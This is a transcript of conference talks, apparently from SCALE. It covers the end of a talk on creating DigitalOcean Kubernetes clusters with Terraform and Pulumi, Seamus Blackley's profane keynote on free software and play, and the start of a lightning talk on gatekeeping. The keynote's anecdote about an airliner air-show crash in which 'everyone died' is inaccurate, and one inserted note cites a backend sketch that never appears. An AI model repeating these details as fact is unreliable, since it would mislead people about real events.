hey, I don't need to change anything, this already exists. And if they need to, say, scale up the cluster, Terraform can tell them exactly what it needs to change from what exists to get there. This is all really good for environments like your entire staging environment or your entire production environment.
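(End to end, the Terraform flow demonstrated above looks roughly like this. The Kubernetes version and size slugs are illustrative, and the API token is read from the environment.)

```bash
# Write a minimal DigitalOcean Kubernetes config -- a sketch; slugs are illustrative.
cat > main.tf <<'EOF'
terraform {
  required_providers {
    digitalocean = {
      source = "digitalocean/digitalocean"
    }
  }
}

# Reads the API token from the DIGITALOCEAN_TOKEN environment variable.
provider "digitalocean" {}

resource "digitalocean_kubernetes_cluster" "my_cool_cluster" {
  name    = "my-cool-cluster"
  region  = "sfo3"
  version = "1.25.4-do.0" # illustrative; list real slugs with "doctl kubernetes options versions"

  node_pool {
    name       = "default"
    size       = "s-2vcpu-4gb"
    node_count = 3
  }
}
EOF

terraform init    # download the provider
terraform plan    # preview what will be created
terraform apply   # create it (prompts for confirmation)
```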
As I say, you can get fairly complex with Terraform, chaining different resources together and feeding them into each other, so you can build quite a complex setup. It's also very good for disaster recovery: say an entire region goes down — it's fairly trivial to change one or two variables and boot up a whole other region in any cloud you can think of, since almost all of them have providers and can do it fairly quickly. So, last, one of my favorites: Pulumi. We're going to start with a code snippet, because this is the meat and bones of it. Pulumi is very much like Terraform and can actually piggyback off Terraform as well: if a Terraform provider exists for something, Pulumi can piggyback on it. Pulumi is more of a library for whatever coding language you'd like — Python, Java, C#, Rust, or, in this instance, Go — and you define your infrastructure as actual code. This right here is literally just a method where I'm defining a new Kubernetes cluster the exact same way I did in Terraform, with the exact same options — with some extra fun Go syntax, the "if err != nil." If you've ever coded in Go, you know exactly what that looks like. So, running a real quick video, you're going to notice that this looks very, very similar to Terraform. It's the same idea — you just run pulumi up. The difference is that Pulumi stores a stack, so I will actually pause super fast to cover that. You can define different stacks, so you can have different environments: your staging environment could be one stack, your production environment another. A stack is very similar to Terraform state — it's the state of the environment and where it's at — and you can store these locally, or inside Pulumi's service, or whatever kind of backing storage Pulumi supports. So it does something very similar to Terraform, but it also tells you: this is what I'm going to create — are you sure you would like to do this? You can go down and view the details, very similar to Terraform's plan. So this shows what my code would go and do, and then you can just say: yes, I would like to perform this update. And then this is super sped up again, but it's just going through and doing the exact same thing: calling the API, requesting to create this resource, and then reporting that we're done. We can also do outputs with kubeconfigs; to keep the code snippet small, we're not doing anything with the output for now, but you could realistically take the output and put it somewhere like HashiCorp Vault, or something of that nature, to share among other developers. And — I don't know if you've ever typed in front of somebody, but it always seems to get ten times more difficult; recording demos, oddly enough, has the exact same effect, so you can see me struggling very hard to type in the command here. But, so this is just the same thing again: we're going to go get the kubeconfig for my cluster, just to show you I'm not fibbing — we actually went and created a cluster. Pulumi does add a small identifier to the end of your resource names, so you can see I had to go grab that and come back. And then we'll just do the same thing we've kept doing: kubectl, get all pods in all namespaces. And lo and behold, we're running a cluster that has only been alive for two minutes. So, what is this good for? This is infrastructure as code, supercharged.
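(The Pulumi workflow described here, sketched as CLI steps — the program itself is the Go method shown in the talk; the stack name below is illustrative.)

```bash
pulumi stack init staging   # one stack per environment, analogous to a Terraform state
pulumi preview              # Pulumi's equivalent of "terraform plan"
pulumi up                   # shows the diff, asks for confirmation, then applies it
pulumi stack output         # read any outputs you exported, e.g. a kubeconfig
```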
With Pulumi, it is quite literally just code. Terraform uses HCL, the HashiCorp Configuration Language, which looks like a derivative of JSON; while it does have logic, the logic has to be pretty basic — it's not something where you can express complex logic for looping, or "include this, exclude that." With Pulumi, you also get all the benefits of the language you chose: as it goes, coding languages are very strong at complex logic — whatever you can tell them to do. Pulumi takes advantage of this, so you can do very complex things, and they provide a mocking and integration-test library for you. So you can write things like unit tests and integration tests against your own infrastructure. Say I provide a CLI interface and I say I want five nodes: you can write a unit test asserting that when I do that, it gives me back a cluster of five nodes. This helps provide confidence in your infrastructure — your infrastructure as code — and gives developers more confidence that what they're doing actually does what they want. The downsides, though: this is fairly complex. It requires an engineer — someone with technical prowess in whatever language you chose — to do what you need with the infrastructure. This is no longer "I need someone to just go click in the UI"; you need in-depth knowledge of how this library works to go and use it. So this is usually best for teams of software developers who are booting up clusters for whatever they're doing, and for when you need something testable — if you need to test your code, and high confidence is a requirement for you, this is very good for that. And one of the strong points I like most: if your code base is in a certain language, you no longer need to context-switch between it and HCL; your infrastructure can be in the exact same language as your main code base, living side by side. The perfect example: my example was in Go, and most everything we write at DigitalOcean is in Go, so I no longer have to swap between the two. It's also fairly good for complex infrastructure. A good example: we were doing something that required a cross-region deployment to multiple regions that all had to tie back together, and it also involved serverless functions. That combination proved complex enough in Terraform that this small little tool — which was only going to be used a couple of times — was taking multiple days to boot up. We instead switched to Pulumi, could express the complex logic and replace things with variables, and got it up and running in about two hours. So when you have something very complex, this sometimes makes it a lot easier than wrestling with a language that isn't really meant for that kind of setup. So, in summary: we went over these four ways to boot up a Kubernetes cluster. The first two, the web interface and the command line, are very fast, simple, quick ways to boot up clusters, focused on that day-one model of maturity for Kubernetes clusters; Terraform and Pulumi are more the day-two, "we want to automate stuff and go fast" type of setup. And this all comes back to taking those weeks, months, and years and making them a lot shorter — making it go faster. And I'd like to say thank you for coming to the talk, and thank you to DigitalOcean for sponsoring me to come.
On most everything, my name is Adusti Oldmuffin — fun story where that came from. You can find me on GitHub and Twitter under that, and, if you want, on LinkedIn as well. If you would be so kind — we have time for a few questions. I'm going to come around with the mic; this time I'm going to hold it, though. Hey — I think you said one of Terraform's pros was that it's auditable. Is Pulumi not auditable, or is it also auditable — I mean, in the sense of external and security auditors? Yeah, so the question was: is Pulumi auditable just like Terraform? In the sense that I believe you can write tools to audit it, yes. The main reason I mentioned that Terraform is auditable is that I know there are plugins specifically for Terraform whose sole purpose is auditing your infrastructure to make sure it's hardened in a security sense. Sorry — so you could include that in Pulumi? Yes, more than likely. Okay. Yes — she works at Pulumi, so... I promise I did not slip him some cash to put Pulumi in the presentation. I had zero idea, so I promise. Questions, questions. Comments. Actually, yes: I joined a little late, so I don't know if you mentioned this, but will any of these tools set up the control plane of Kubernetes? Sorry? The control plane of Kubernetes — do any of the tools you presented set up the control plane, or do they just spin up a bunch of hosts inside your Kubernetes cluster? I got you. These are all focused on booting something up in a cloud provider — I did mention really early on that every tool, or every method, I showed has an equivalent in the various cloud providers. Most cloud providers will boot up a control plane for you, but usually will not give you access to the control plane; instead, they give you access to the worker nodes. DigitalOcean does it very similarly: we boot up control planes for you, with options for highly available (HA) control planes, and we give you the worker nodes — in our model, the worker nodes are what we charge you for. Awesome. I see a question in the back. Could you quickly put up the references slide again? Yeah, sure. Thank you. And 100%, if you want this slide deck or any of the references on this page, feel free to contact me as well; I'll be more than happy to send the slides. The references are: Kubernetes on DigitalOcean — that's just links to our product page — as well as the doctl docs, the Terraform and Pulumi docs, and the Kubernetes starter kit, which I believe is provided by the CNCF. I don't remember the name of it now, but wasn't there a project in Kubernetes to have, like, a Cluster API or something — do you know what I'm talking about? What happened to that? Is that still happening? So, are you talking about Crossplane? No? Okay. I believe there are multiple tools — there was another one called Crossplane that provides something very similar, where you can declare resources as Kubernetes resources and it will spin them up in the various clouds as needed. It's very similar. Too many technical issues came up coming into this talk, since I was prepping last minute, so I went with Pulumi instead — but there are other ways as well. As far as I remember, Cluster API is a sub-project of the Kubernetes project, so I would start there.
Could you briefly talk about the difference between how Terraform handles state and how Pulumi handles state, real quickly? Sure — and I think she can probably cover the Pulumi state more in depth. Terraform state is usually what I would describe as just a JSON file, and it stores the state of everything: everything you see with terraform plan is exactly what's gonna be in that state file. You can configure Terraform to spit it out somewhere shared, say S3 (with a backend block like the one sketched above), or you can keep it locally. I don't know if it's best practice to check it into source control, but you can check it into source control. Pulumi does things in stacks, and a stack is a very similar concept; they just expose it via their tool a lot better, and they will natively send it to their SaaS product. I do things locally instead. That's pretty much the wrap-up. I mean, the Pulumi state is a big JSON file. Yeah. The question was: in Pulumi, can you keep the state locally? And I would have to get back to you on that, because I work there, so I get a free account. I can actually answer that and say yes, you can — that's what I did for this demo. Yeah, I didn't feel like pushing it, so you can configure it to just push locally. No problem. So I see people are bringing in chairs and drinks and all this sort of thing, so I will thank Daniel once more. Thank you so much. Thanks, everyone, for being here. What an awesome, awesome day, and I hope to see everyone at UpSCALE. All right. Have a great conference. See you around.

Yeah, okay. Good evening, SCALE. Are we, are we ready? Let's do this. Okay. So our first speaker tonight is Seamus Blackley. He's going to talk about the importance of independence. Seamus needs no introduction to those of us who follow him on Twitter. He's lived more lifetimes than all of us combined can imagine. He's worked on game development, on physics in games. He's worked on some advanced math, some baking. He said there would be bagels, but there aren't any, so I'm disappointed about that. And I also had him come here yesterday just to do a full-on dress rehearsal to an empty room. I think he enjoyed that. But anyway, without further ado: Seamus Blackley, guys.

All right, let's do this. Hey, everybody have enough drinks? The most important thing when you hear me talk is that you have enough drinks. All right, everybody drink up — otherwise you're not going to enjoy this. I'm sorry. But try to get into an altered state anyway. I might end up putting you in an altered state called boredom. Today we are going to talk about innovation and freedom. Freedom is something I think is very important to this crowd and to free software, which is the thing that's been dear to my heart my entire career. I am Seamus Blackley, and today's date, although Bala told me otherwise, is not 7/28. It is 7/29. Yesterday when I came here, this was my talk. It was less stressful. It was a perfect presentation. We're going to have a less perfect presentation today, probably much worse, about freedom, tinkering, and innovation. These are — I mean, this is the center of my life. So hopefully I won't bore you too bad. I have some housekeeping to get out of the way first. I fucking hate slides. There are not going to be slides for this presentation. Here is the main slide for this presentation: the subtle absence of slides. All right, so listen. Here's the deal.
Almost everybody in this room, including me, is in the business of making something from nothing. And probably most of us, our entire careers, have been in a weird situation when you go out to an event, or you meet your sister's new boyfriend, or your parents' friends come over, and they want to know what you do. And they are never going to understand what you do. It's just not going to happen. It doesn't matter if it's security, encryption, whatever it is — they're never going to fucking understand. And they may deride you for it as well, which is awesome, because you have some dude who works in a bank and he's telling you you're an idiot, and you're like, yeah, okay, cool. I have this thing called cryptocurrency. It might fuck your job up. Just pay attention. So anyway, the thing about it is that what we have been doing this whole time is creating value from vacuum. Some refer to this as pulling it out of your ass. It's similar. And yeah, that's right — it's the spirit that matters. And a lot of people can't understand this, and it's specifically strange because guys from my generation and older — you know who you are — come from a world where everybody was a banker, everybody was in real estate, all the cool kids were making money in manufacturing. And in those worlds, you are playing a zero-sum game. Some guy mines the minerals that the other people can't get to, and he wins over them. Somebody sells a property for more money than the other guy, or sees some kind of tax benefit better than the other guy, and he wins. The other guy loses. And the thing these people do not understand about what most of us in this room do is that we're not playing a zero-sum game. We're playing a game where there's nothing, and then you work really hard, and if you can stay sane and pay for food, after that there is something of value that gets sold to somebody, and your sister's boyfriend is super confused about why you have a nicer house than him. Okay. And then, to add incredible befuddlement for these people, you start to talk at Thanksgiving about the fact that the software you write, you are giving away to other people for free. And then they're really fucked up. They really don't understand what you're talking about. But it's interesting, because the free business model has been around for all of human civilization. I am sure the first drug dealer gave some free samples; kickstarted his business that way. Most people do work for free all the time — they just don't notice it. And what I want to talk about tonight, with respect to freedom, creativity, innovation, tinkering, all these things, is that it's that free part — the part when you're playing around, the part when nothing's on the line, when you're not playing with a $100 million investment, when you're not driving a super expensive truck — it's that moment when you're actually gonna create something new, because you're free and you're not worried about shit, right? You're not concerned about anything. And by the way, I know plenty of programmers who are just fucking psychopaths, and they never worry about anything anyway, and they're awesome, because it doesn't matter what they're doing. But for most people, that moment where you're free is the moment where you achieve this maximum creativity, okay? And that's the magic moment. That's the moment that the old world didn't understand. And the trick is: how do you get yourself into that space, often and aggressively?
How do you manufacture a situation where the largest number of people at your company are in this creative space, for instance — generating revenue from nothing, a giant anal-extraction factory? You have to do this to succeed. And the answer is: you try to put them all into this place where they're playing, where they're just screwing around. Better — even better — where they're playing and showing off to their friends, okay? Where you're showing off the stuff you do to your friends. I've had some interesting experiences at places like Microsoft and other unfortunate employers, where I've tried to explain to people that we need to give — I will call them the anal class, the class of people who make something from nothing — you have to give this group of people as much freedom as you possibly can if you want to make any money. Okay, and money guys will immediately tell you that you need to constrict their freedom as much as you can. We must make a walled garden. I love that term, because, you know, I don't think the prison exercise yard is a walled garden. They want a euphemism where you own everything that somebody makes, but you still expect them to be really creative and able to show off to their friends. It never works. It never works. At Microsoft, we had a real problem when we were starting this Xbox game console up — and in case you don't know, I am colloquially known as the father of the Xbox, which is kind of fucked up, because I don't know if it'll ever want to move back in, but if it does, it's fucking paying rent. But in fathering a plastic box filled with transistors, I had to figure out a way to get the most important people in that ecosystem to feel freely creative, and that's the game developers. They're going to make games for the box, and they don't work for Microsoft. They work for a thousand different companies. In fact, the best ones are working for a company that doesn't exist yet. They have an idea nobody's thought of yet. Their idea is better than the big game publishers', better than the other console manufacturers', because they're working alone. She's in her room at her mom's house developing something that's the coolest thing you've ever seen. How do you get to that person if you're Microsoft and you want to fucking own everything? Because they want to fucking own everything. How do you get there? Well, you have to convince them about this model that I'm talking about. You have to tell them that freedom leads to creativity, which leads to the creation of value from nothing, right? It's something I think about all the time. I was fortunate enough, when I was young and stupid and recruiting people for a game company at MIT, to meet Richard Stallman, the fucking god walking the face of the earth. And he explained to us something that stuck with me for a really long time about all this. And that was this concept of showing off to your friends. And it was really obvious to all of us then, because — I'm an older guy — we started programming in the late 70s and the early 80s, and there was no GitHub, there was no internet, there was nowhere to get any kind of code that you could copy or look up, except maybe in a magazine. And there was no way to distribute anything you did. So the only joy you got out of writing code, aside from the kind of masturbatory joy of seeing that you could do it — which, I don't want to discount that; that's another talk entirely — was the joy of showing your friends: hey, I did this amazing thing.
And then something magical happened, which was totally new to me and, I think, very new to culture in general: automatically your friend would be inspired by that and maybe do something even better. And then maybe you'd do something even better than that. So we were steeped in that culture. And guys from my generation, I'm very proud to say, made so much of the infrastructure that we take for granted today — incidentally, all running on open source software, right? And the reason it's all running on open source software is because that generation of people, who wanted to show off to their friends, were encouraged to do things better and better and better, more secure, more real. When everyone can look at your code, you write good code. When everyone can evaluate whether or not your shit works by looking at how it works and making their own tests, you don't lie, okay? When some software is operating a nuclear power plant, I'd like to think that more than one guy has looked at it. And furthermore, I'd like to think that the person who wrote it was having a good time writing it — that the person who wrote the controller for the cooling towers, right, she was really excited to show her friends how there was no scenario in any test that could cause it to melt down. That place of play and creativity. It doesn't matter how serious the job is; it's play and it's creativity. And there's a positive side to it, which I've been talking about. Game development for me has been a tremendous source of a lot of this, because the product of game development is fun and happiness, and so you kind of want to make sure everybody's fun and happy making a game. Tell Electronic Arts that — but that's a separate talk, also. Then there's the dark side. And there's a great story that I often tell — I probably shouldn't name names here — but it involves a large European passenger aircraft corporation and a certain model that they had. The way that modern jetliners work obviously involves a tremendous amount of software and automated control systems, and we have moved past this idea that there's a physical connection between the thing the pilots hold and the control surfaces of the airplane, right? And this was a big tenet of Boeing for a really long time: they wanted to make sure there was a physical connection to the control surface. There were a couple of accidents, unfortunately, that showed that no matter how enthusiastic a pilot was, they couldn't apply 180 pounds of force on the stick for an hour to get back to the airport. And so people came around to this idea, and they said, okay, maybe it's a good idea to have actuators with software running this. And of course that's dangerous, because programs crash. A friend of mine at MIT worked on the F-22 fighter control system. He told me the F-22 could reboot at 22 hertz. I'm like, I don't know that that's an awesome thing to brag about, but that's pretty amazing. And so the way that people thought about this is voting. Most of you guys know this, and a lot of systems do this: they vote. There's a point to this story, I promise you, so just stay with me, okay? So at this large European passenger aircraft manufacturing company, they had the idea that they would have separate teams of people, with no contact, make separate systems that operated with completely different control laws to decide what to do with the control surfaces when the pilot moved the stick and the throttle — and then they would vote, and whichever got the most votes is what the control surfaces would do, right?
And they isolated them from one another, so the feedback that they got was only to themselves. Worse — worse — they told them they couldn't talk. So all the fun was gone. Nobody was showing off to anybody else. And then they had a shared cafeteria. Ha, ha, ha, ha. It is not that funny, because the first Paris Air Show debut of this airplane resulted in the airplane doing a fly-by, the airplane control systems deciding this must be a landing, extending the gear — and everyone died. There's a really dark side to this, and it's a lesson. And I think it's something to also keep in mind when you talk about the many benefits of free software, when you talk about the evolution of Linux and why it's so important, why it runs the world. So understand that the openness and the playfulness, the inquisitiveness that causes people to want to work on free software, to work with free software, to share software, to work together on projects where the value is the input of the ideas and not the control of the license — that is critical to making systems that matter. So you can go all the way from Halo to crashing jetliners and find examples of why it's important to drive what you do with this playfulness and this inquisitiveness, and to go a step past that and, I think, understand the point of this entire exercise. And when I look at a conference like this, the point of the conference is to learn more about how to engineer the spirit of openness and sharing into the process of making things, so that baked into these systems is a measure of this safety and a measure of this fun. And it's also important for ensuring that the world isn't just sort of a grim hellscape. Part of the reason I say that is that interfaces are miserable at the moment. You know, if you fly on an aircraft and you're trying to use the in-flight entertainment system, and if you're an asshole like me, you're touching the screen and you're like, oh, that's three-quarters of a second. You touch it again: that's almost a second. Yeah, fuck these guys. Okay, what if I touch twice? You know what I'm saying? I spend half the flight trying to crash this fucking thing. And I'm imagining the team that put this thing together, and on different airlines — if you become a connoisseur of terrible in-flight software, as I have — you'll imagine what the working environment of these software teams was like. Like, what concrete basement were these poor motherfuckers in? And how little time were they given to get this piece of shit done, you know? And you're like, okay, clearly these guys were given the last generation of video player that was lying around somewhere and has a terrible response time, and its libraries are in, like, Fortran. And they're like, okay, what are we gonna do? And it's: oh, you have two weeks and $20,000. Just like, ah. And then there are good ones. And you know, I've programmed so much and worked on so many projects now, being ancient, that — and maybe some of you will agree with me here and tell me that I'm not totally insane — you can kind of feel this when you're using it. And the airline entertainment system is a really good example, because it's a completely captive audience, right? You can Turing-test the shit out of this thing, and you have hours and hours to do it. And so I enjoy trying to figure out what's good and what's bad, but the overarching feeling I get, trying to use these systems again and again, is the same thing.
It's that the joy that the team of people felt making it is the joy that it gives me. And if the team of people making it had a shitty time and a bad boss and were miserable and didn't have enough resources, I'm gonna have that experience. I usually have that experience. Drinking helps a lot — if you have a couple of beers, yeah, the response time becomes less of an issue. But the trick is that even when you're trying to be entertaining, you can be totally un-entertaining if you haven't built the software and built the system in such a way that you have this play involved in actually architecting the entire thing, okay? And I think that in the early days — in the UNIX days and the pre-UNIX days, when I started programming — it was completely extraordinary to find jokes in the manuals for software and for computer systems. You know, I wasn't ready for that in the late 70s and the 80s, because the world was very serious, and engineering was very serious, and computers were NASA, computers were on Star Trek, and they never told jokes, and it was totally serious. And then you'd be looking through the manual for something and there'd be, like, a UNIX joke, and I remember the IRIX manuals — the Silicon Graphics manuals — were fucking hilarious, made jokes about, like, the hostage crisis in Iran and stuff, and I'm like, what the fuck is going on here? And you know, when you're in that culture, you think: this is really special, because we're working on these computers and we're special people and we don't have to follow the same rules as everybody else, and we can have fun, we can tell jokes, and we can be different — we dress how we want, and we can have long hair, and we can be whatever gender we want. And that was really a true thing; it was a completely special time. But the thing I didn't realize at the time, because I was too young, was that the reason all those things were true was that it was a group of people who were creating value from nothing in a way that the other business people couldn't figure out, and they reacted to it by working together and having fun doing it. And so the jokes, and the joke names for everything, and things like having a penguin logo for your operating system, and all the other stuff that we fucking love, came from that playful spirit. And you think, oh, that's just because we're underdeveloped kids, we never grew up, we're not serious like the bankers — and this is, again, back to your sister's boyfriend, who looks at you because you dress like this and you don't dress in a suit like he does to go to his fucking job as an investment banker. Okay, fine. But the... Brother. And I want you to know, my son is sitting, like, somewhere right over there; he will confirm: I am wearing pants for this. That's a big deal. But the playfulness doesn't come because we are malformed human beings, or because being good at math or programming makes you somehow socially stupid. I would say quite the opposite. In fact, I've argued this many times before, but the level of social interaction at a D&D game is much higher than at any fucking cocktail party I've been to. And I've been to a lot of high-end cocktail parties, and those people be fucking dull. I used to work for Steven Spielberg, and when I came to DreamWorks — and I don't want to go over my career, because everybody does that and it's really fucking boring — I reported to Steven. They were like, oh, here's your job, and here's your boss: it's Steven Spielberg. And I'm like, the fuck? Okay.
But years later, when I was doing, interestingly, entertainment finance — which is a totally separate story — I was talking to him one day, and I had to give him some piece of information about our business. And I called his attorney, Harold Brown, who's also an awesome, fun-loving guy — the entertainment business has a little bit of this — I called Harold and he wasn't available. All right, so I called my boss, who ran this big company that worked for Steven, to say hey, I need to talk to Steven. Boss wasn't available. All right, so I called Kathy Kennedy, who was his producing partner and his old assistant. She wasn't available. I was like, fuck it, so I call Steven. Picks up, first ring. And I was like, hey, I tried to call Richard and Harold and they didn't answer. And he's like, James, you don't fucking get it. I have all those people so I can sit around and answer the phone whenever I want. Like, okay, I get it. Very good story. And I told him about this problem, and I was saying, you know, it's kind of weird: I deal with all these financial people all day long, and they're really concerned about whose name is first on an email, and who gets invited to lunch first, and who makes slightly more money, and which model year of car they have, and it's starting to really freak me out. And he said something really wise. He said, hey, you know, when you're walking down the street and you're walking past a tree, and there are ants climbing up the tree, you think to yourself: do the ants see me? Am I terrifying to the ants? Are they just talking to one another? Are they living in the ground there? Did they come a long way? Do they all know they came a long way? What's it like to climb? What's up the tree? What are they thinking? It's not that bad a story — it really has a good punchline. Okay, so, anyway, he said: listen, those guys in the other world, they don't think that way. They're not having that imagination. They're not walking down the street imagining a page of code, or walking down the street imagining some way to use a piece of technology to do something magical. They're walking down the street thinking: who else is going to the lunch I'm going to tomorrow, and can I be in a better spot than them? And he said, you should feel bad for those guys. You should feel bad for them. So, a subtext of this is: if anybody's ever made you feel bad about being in this world, fuck them, because this world kicks the shit out of their world, okay? All right, so I'll leave some room to ask questions — and hopefully nobody asks questions and I get to finish early, which would be great, and have a beer. But the last thing I wanted to go into is kind of the corollary to all of this, which is something that, I figure, you guys think about quite a lot. And I know you come from very diverse backgrounds of different industries and experiences in life, but you're all here at a free software conference, and so you all have this kind of experience in common. And maybe it's something that nobody tells you enough, and it might sound really cheesy, but you know, the entire world basically operates right now because of free software and how it started. There's no part of our lives that isn't touched by the philosophy of Stallman, by Linus. Nothing. No part of your phone. This presentation running on this Apple laptop — and what is the Apple really running? You know? That's right. Well, a shitty version of, yeah. Yeah. Yeah. Nice.
But I think we get all tied up in shit around what's the newest thing, what's the newest trend, what's going on, what do we need to learn, what's happening, who am I talking to, what's my project, how do I find a boyfriend who's not abusive — all these things. And you might forget the overall context: the fact that, as much as we're in, like, a shitty hotel room here, and as much as people don't take this as seriously as they should, the shit that we do runs the whole world, and they'd be super fucked if we didn't do it. And it's just true, right? I mean, what's the first thing that somebody who knows what they're doing does when they're given a new computer that has Windows on it and it has to do something important? That's exactly right. And then what do you do for fun when you go home? You try to put that same operating system on a Raspberry Pi Zero and freak out for, like, eight hours, and then finally get the kernel up, and it doesn't really work, but you still think it's victory. But any computer that needs to do anything important in real time, any system that needs to do something important or connect to other systems, any time important data needs to be transferred — every stock trade, every crypto trade, every contract, the transmission of every contract, smart or not, every flight schedule, every space mission, every robot on another planet — all of them depend on the continuation of free software and the spirit of play and innovation that built it all. Try to keep that in mind through the times that suck, okay? All right, I'll take questions now. I have a slide for this. Oh shit, people are raising their fucking hands. Okay, all right. I'll give you a copy of the slides for sure — freely available. What's my favorite open source software? I have to say my favorite open source software is the numerical libraries for Python. I think NumPy and OpenCV are absolutely fucking changing the world, right? And making the world safer and better. And my favorite video game is — yeah. What's your favorite song? I don't fucking know. Like, the first functional build of Halo is my favorite video game, okay? I still have it on an Xbox dev kit and play it, and it runs for almost five minutes, but it's a glorious five minutes, man. Advice for new developers? You know, it's boring: find a place where you can play. Like, if you're doing something and you're not having fun doing it, you're gonna be fucked. And it's not always fun, right? It's a pain in the ass a lot of the time, but if there's no core of play at the heart of what you're doing, I don't care what it is that you're writing — you're fucked. And I know that's like an Old Testament kind of a message, like a thou-shalt-not kind of a thing, but that's what it is. Have fun or you're fucked. I should put that on a gravestone. Over here — your X Window comment was straight up. Oh, NeXTSTEP? Oh, even better. Yeah. I have stories about NeXTSTEP. I have not. I'm sorry, dude, I — sorry, Neil. Is Neil here? Am I — oh, okay, sorry, Neil. Really sorry, Neil. Is that it? Your other question is about the dead guy also? Well, you get one question, it's okay. You made me feel bad. So, yeah, I know — I mean, just think about the amount of shit code Don Knuth has seen in his life. Right? Right? Do you know who Donald Knuth is? Have you read Donald Knuth? So the truth is that the world pumps out shit at a prodigious and terrifying rate. And software is no different than anything else, than news or books or anything.
And the trick, I'll tell you as an older guy, is just to keep learning. So when you're hitting — you know, even on a single project, if you're hitting something that's just really pissing you off, or you're forced to work with somebody who's just writing garbage — give it a break: work on something else, some other part of the system, for a minute; learn something else. I was taught a trick in the past by a guy called Doug Church — he works at Valve now, I think, wherever he is — one of the first architects of real 3D in real time. Doug would just switch languages. He'd be like, okay, I'm gonna do this in Ada now. And it would piss him off, but then he'd get back to it and it was okay. All right, you've had enough answer now. Your neighbor next. Oh, I would say MIT. Yeah, but that's just regional pride. So there's no — you know, the thing is that the standardization of open software licenses is one of the greatest gifts we were ever given. And so, you know, I can't say enough good stuff about that. So yes, but it's MIT for sure. And this one I've used a lot. I forced Microsoft to use it too, which was a trick. Conferences like this, obviously. No, this is really cool. I was — so I was distracted by my son. What? I'm sorry. What's your favorite way, or what's the best way, for software developers to meet one another? Conferences like this. Okay, there you go. Okay, sorry, that's a cheesy answer. So I'm gonna hold up my son again. He's the only person you'll ever meet who gets into, like, Berkeley and MIT and goes to art school — which is true; he's badass. He was like, what are we going to? It's a UNIX what? And I explained to him what was going on. And he was like, this is really fucking cool. This is really, really fucking cool. And it is really fucking cool, you know? Something from you? Oh, man, I have a really demanding day job, and I fuck it up so bad that I gotta work on that for a while, but thank you for your vote of confidence. I've been trying to avoid, like, this guy all night. All right, go ahead. What do you got? What do you got? So what do you say to the entitled user that keeps on asking for more and more shit? There's a great story about this, and you can use this story, okay? There's this legend at Microsoft — and I met all these guys at Microsoft who'd been there a long time, who helped get Xbox approved because they're really senior, right, and they saw in the spirit of that project kind of how Microsoft was before antitrust and all that, because it was a very exciting and cool place when they first started out. And they would tell the story of That Guy. And the user you're talking about is That Guy. And one of the huge mistakes that was made on Windows was servicing That Guy. And you can tell — in Office and in Windows, it's this weird thing where it's mistaking options for value. It's like, you could do everything every way, and that is not increasing the value in any way, right? And they basically fucked themselves on that. So That Guy became a curse, right? And then Apple comes along and does very concise user interface stuff, and windowing systems stolen from elsewhere. And... That's what it is. And suddenly the world sees the value in actual value. And so, you know, the rude way is to go to that user and say: don't you have a fucking job to do? Aren't you using this software for something? Why don't you get your work done and shut up? Okay.
Yeah, yeah, I should never be in PR. Well, yeah, I do. And I had to deal with a little of this. You're never gonna get them to make their software free. What you're gonna do is go and mine for examples of places where open software made other companies money. And it's often not obvious. A lot of companies have made a lot of money with free software and open source software, because they have delighted their users and they've created economies of developers who make the product stronger. There are also cautionary tales that are really useful — companies that did not choose an open architecture and got crushed and became road pizza. Okay. And, you know, I can think of several graphics companies that have done this — I don't want to name names and be a dick — and special effects software has a couple of examples of these. So go to those, find the one that matches your company best, and say: here's the bad case. And the good case is, we can get a ton of people doing free work for us by just opening this up. And a lot of it is just getting people over this fear. And again, you know, this is the cultural divide between the people in this room and the banker dudes: we feel okay betting on our future selves to make more value. In fact, we have to. The way we're going to pay our rent next month and next year is that we keep on writing more code, right? So you trust yourself to do that. Those guys are playing a zero-sum game. They're always thinking about a zero-sum game. So it's like: what we own now is what we have to exploit. And so you're pushing them into a different mindset, where they realize that the value of their company isn't the code base they have right now, but the team that made that code base and that will continue to work on it. And those are really the arguments you need to find a way to make. All right, we have maybe two more questions. Did everybody hear the question? This is a question about InnerSource and other types of open source theater that's going on right now in large companies. And I think open source theater is exactly what it is, okay? And, you know, I think it's frustrating, and as nerds it pisses us off, because they're full of shit. But it's a step. Because when cultural change needs to happen — like I was telling this gentleman — these guys need to get over their fear that the code they have right now is the value, and realize that the team writing the new code is the value, right? If they see that enough that the PR people are starting to do messaging about it, that's a step. All right, one more — the guy in the back. And if you yell, I don't have to repeat the question, which is awesome. Only — well, where are you in Mexico? That's really — it's a question. D.F.? Okay, I'll go to D.F. I'll say anything to get to D.F., just to get some proper D.F. tortillas and some proper D.F. quesadillas. Of course, man, without a doubt. I would do this in Spanish, but there's nothing to be done, okay? All right. All right, I think that's all I'm gonna do for now. So thank you very much. I'll see you guys later.

Hello, everyone. Oh, this is loud. Thank you, Seamus, so much. One more round of applause for our opening keynotes. We liked him so much we gave him a two-night gig. So next up we're gonna be transitioning into UpSCALE, which is our lightning talk series. We've got some great content for you. We're getting set up, so that'll be in a minute.
If you missed the first round of drink tickets, my friend Luis in the back has them. If you haven't already gotten one — well, he's about to get mauled. Please be nice to him. And there are still lots of snacks, so grab a snack, get your seat, and we'll begin in a few seconds. All right, everyone, we're ready for UpSCALE, so please take a seat. If you're still waiting at the bar, just wait quietly so our first speaker can start. All right, if you're standing in the back, we'd love and appreciate your silence, or at least quieter talking. Do we have slides up? Your slides disappeared. Move the chair too, so you can move around. Good. All right, so without further ado, I'd love to introduce our first speaker. This is Solona. She's gonna be talking about unconscious gatekeeping in tools. So give it up.

No one told me I was going to be following Seamus. All right, so first of all, what is gatekeeping? I love this word because it's accurate. It is basically obstacles that you put up that keep people out. And I'm mainly going to be talking about unintentional gatekeeping, not all the other types of gatekeeping that go on. In fact, why does gatekeeping exist? It's because of what Seamus was just talking about: this whole scarcity-versus-abundance thing on a lot of these different fronts — we do still deal with scarcity. And this talk has some scarcity too, in that I'm not going to cover accessibility. There's a lot of stuff out there — these are all open source tools; it's y'all's responsibility to get out there and find that out. So what I wanted to talk about is more things like role diversity. We need more than just developers in open source. We need all of these other roles out there, and we need to be more inclusive towards them. We also need to watch our language. We end up excluding so many people when we don't build multi-language capabilities into the tools that we create. Please remember to bring those in. And then also time zones. Don't depend on everything being synchronous. Think asynchronously. Try to introduce that in some format, even if it's not always as friendly to your tool or gathering. Also, cultural gatekeeping. Do you want to explain to this woman why you call things master and slave? Maybe it might be okay if you insert a BDSM joke, but for the most part we've got some cultural gatekeeping that we have to take care of, and we need to look deeper at it. Also, meritocracy is a myth. We do not all start out equal, and we have to make sure our tools don't assume that either, because we end up blocking a lot of 